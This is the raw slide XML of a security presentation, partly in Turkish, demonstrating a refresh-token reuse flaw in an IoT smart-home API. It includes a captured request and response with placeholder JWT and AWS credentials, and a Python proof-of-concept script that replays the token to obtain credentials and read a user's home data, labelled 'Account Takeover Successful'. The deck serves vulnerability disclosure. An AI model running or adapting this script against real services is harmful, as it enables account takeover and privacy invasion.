            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447775" y="682675"/>
            <a:ext cx="3798000" cy="3275100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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POST /auth/refresh-token HTTP/2</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Host: api.companyiot.com</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Content-Type: application/json</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Pragma: no-cache</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Accept: application/json</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X-NNN-Latitude:</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X-Amz-Date: 20250510T174828Z</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X-NNN-Build-Meta: iOS-18.3.1-PH-PROD-STD-3.1.29-P-HOMEWHIZ</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X-NNN-Longitude:</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Cache-Control: no-cache</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Content-Length: 255</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User-Agent: aws-sdk-iOS/2.40.1 iOS/18.3.1 en_TR</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Accept-Language: en-US,en;q=0.9</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Accept-Encoding: gzip, deflate, br</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X-NNN-Env: LIVE</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  "refreshToken": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZWZyZXNoQ291bnQiOjI1LCJpc3MiOiJjb21wYW55aW90IiwiZGV2aWNlSWQiOi0xMjM0NTY3ODkwMTIzNCwiZW1haWwiOiIweGZyZDFndWxAZ21haWwuY29tIn0.signedpart123",</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  "devicePlatform": "iOS"</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 sz="700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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b="1" sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="390575"/>
            <a:ext cx="30000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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Demo Request:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361975" y="328675"/>
            <a:ext cx="30000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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Demo Response:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5501200" y="635650"/>
            <a:ext cx="3041100" cy="4381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700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/2 200 OK</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Content-Type: application/json</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Content-Length: 1649</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Date: Sat, 10 May 2025 17:55:09 GMT</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X-Amzn-Trace-Id: Root=1-00000000-fedcba9876543210abcdef12</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X-Amzn-Requestid: abcd1234-efgh-5678-ijkl-9012mnopqrst</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X-Amz-Apigw-Id: apiGatewayId789xyz</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X-Cache: Miss from cloudfront</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Via: 1.1 anotheredge098765.cloudfront.net (CloudFront)</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X-Amz-Cf-Pop: DEMO45-X1</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X-Amz-Cf-Id: 1122AABBCCDDEEFF998877665544332211QQWWXXYYZZ</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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"success": true,</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"code": "0",</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"description": "Refresh successful",</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"data": {</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"refreshToken": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZWZyZXNoQ291bnQiOjI4LCJpc3MiOiJjb21wYW55aW90IiwiZGV2aWNlSWQiOi0xMjM0NTY3ODkwMTIzNCwiZW1haWwiOiIweGZyZDFndWxAZ21haWwuY29tIn0.fakeJWTsig2",</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"credentials": {</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"accessKey": "FAKEACCESSKEYZXCV098765",</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"secretKey": "FakeSecret987zyxwvut3210ABCDEF654321",</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"sessionToken": "FAKESESSIONTOKEN..sampleTokenChunk..LMNOPQRSTU09876==",</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"expiration": 1746903309000</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  }</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;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78" name="Google Shape;278;p3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solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279" name="Google Shape;279;p39" title="burp.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197650" y="540227"/>
            <a:ext cx="6748700" cy="4063024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717100" y="1265825"/>
            <a:ext cx="9459900" cy="7926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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📦 PoC: Refresh Token Reuse</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Bu slayt, şu işlemleri yapan bir gösteri betiği içermektedir:</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a:p>
            <a:pPr indent="-295275" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Yetkili bir oturumdan geçerli bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>yineleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> belirteci yakalar</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Yeni erişim belirteçleri oluşturmak için belirteci yeniden kullanır</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kullanıcı etkileşimi olmadan kimliği doğrulanmış API çağrıları yürütür</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>** Not: Etik nedenlerden dolayı, bu slaytta hiçbir hassas bilgi veya üretim belirteci yer almamaktadır.**</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ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272825" y="200350"/>
            <a:ext cx="9459900" cy="79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500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import requests</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import time</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from requests_aws4auth import AWS4Auth</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Yakalanan refresh token, JWT yapısında</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REFRESH_TOKEN = "&lt;REFRESH_TOKEN&gt;"</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Kimlik yenileme ve veri çekme uç noktaları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AUTH_ENDPOINT = "https://api.&lt;companyiot.com&gt;/auth/refresh-token"</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DATA_ENDPOINT = "https://smarthome.&lt;companyiot.com&gt;/my-homes"</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Uygulama içi yaygın header yapısı (User-Agent + meta veriler)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common_headers = {</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"Content-Type": "application/json",</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"User-Agent": "aws-sdk-iOS/2.40.1",</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"X-&lt;Comp&gt;-Env": "LIVE",  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Ortam bilgisi: Canlı sunucuya erişim</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    "X-&lt;Comp&gt;-Build-Meta": "iOS-18.3.1-PH-PROD-STD-3.1.29-P-&lt;Mobile-IoTApp&gt;"  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Uygulama versiyonu &amp; platform bilgisi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</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for i in range(2):</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print(f"\n🔄 Iteration {i+1}")</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ JWT ile kimlik yenileme isteği</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    payload = {</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"refreshToken": REFRESH_TOKEN,</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"devicePlatform": "iOS"</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auth_resp = requests.post(AUTH_ENDPOINT, json=payload, headers=common_headers)</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if auth_resp.status_code != 200:</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print(f"❌ Refresh token failed: {auth_resp.status_code}")</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continue</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ AWS temporary credentials çekiliyor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    creds = auth_resp.json()["data"]["credentials"]</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access_key = creds["accessKey"]</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secret_key = creds["secretKey"]</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session_token = creds["sessionToken"]</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ AWS imzalı istek için yetkilendirme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    aws_auth = AWS4Auth(access_key, secret_key, "eu-west-1", "execute-api", session_token=session_token)</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ Kullanıcının IoT ev verisine yetkisiz erişim</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    api_resp = requests.get(DATA_ENDPOINT, auth=aws_auth, headers=common_headers)</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if api_resp.status_code == 200:</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print(f"✅ Account Takeover Successful! Response:\n{api_resp.text[:]}...")</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else:</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print(f"❌ API access failed: {api_resp.status_code}")</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    time.sleep(1)</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print("\nTest completed.")</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188575" y="2340900"/>
            <a:ext cx="3432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rPr>
              <a:t>PoC Exploit Demo Code</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5669450" y="2192950"/>
            <a:ext cx="3432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rPr>
              <a:t>PoC Result</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="299" name="Google Shape;299;p42" title="terminal.png"/>
